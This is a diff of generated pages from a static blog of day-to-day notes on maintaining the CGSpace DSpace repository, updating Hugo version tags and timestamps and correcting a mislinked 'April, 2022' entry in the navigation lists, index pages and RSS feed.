<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -408,9 +408,9 @@ sys 2m7.289s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -358,9 +358,9 @@ COPY 54701
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGIAR Library Migration"/>
<meta name="twitter:description" content="Notes on the migration of the CGIAR Library to CGSpace"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -282,9 +282,9 @@ dspace=# select setval(&#39;handle_seq&#39;,86873);
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace CG Core v2 Migration"/>
<meta name="twitter:description" content="Possible changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -467,9 +467,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace DSpace 6 Upgrade"/>
<meta name="twitter:description" content="Documenting the DSpace 6 upgrade."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -471,9 +471,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -96,6 +96,24 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
<p class="blog-post-meta"><time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time> by Alan Orth in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
<a href='https://alanorth.github.io/cgspace-notes/2022-04/'>Read more →</a>
</article>
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
@ -122,24 +140,6 @@
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">April, 2022</a></h2>
<p class="blog-post-meta"><time datetime="2022-03-01T10:53:39+03:00">Tue Mar 01, 2022</time> by Alan Orth in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-02/">February, 2022</a></h2>
@ -380,9 +380,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -6,7 +6,16 @@
<description>Recent content on CGSpace Notes</description>
<generator>Hugo -- gohugo.io</generator>
<language>en-us</language>
<lastBuildDate>Tue, 01 Mar 2022 16:46:54 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/index.xml" rel="self" type="application/rss+xml" />
<lastBuildDate>Fri, 01 Apr 2022 10:53:39 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>April, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-04/</link>
<pubDate>Fri, 01 Apr 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2022-04/</guid>
<description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
</item>
<item>
<title>March, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
@ -24,15 +33,6 @@
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
<title>April, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-03/</link>
<pubDate>Tue, 01 Mar 2022 10:53:39 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2022-03/</guid>
<description>2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&amp;rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.</description>
</item>
<item>
<title>February, 2022</title>
<link>https://alanorth.github.io/cgspace-notes/2022-02/</link>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -396,9 +396,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -419,9 +419,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -444,9 +444,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-04-24T21:06:28+03:00" />
<meta property="og:updated_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@ -423,9 +423,9 @@ sys 2m7.289s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

Some files were not shown because too many files have changed in this diff Show More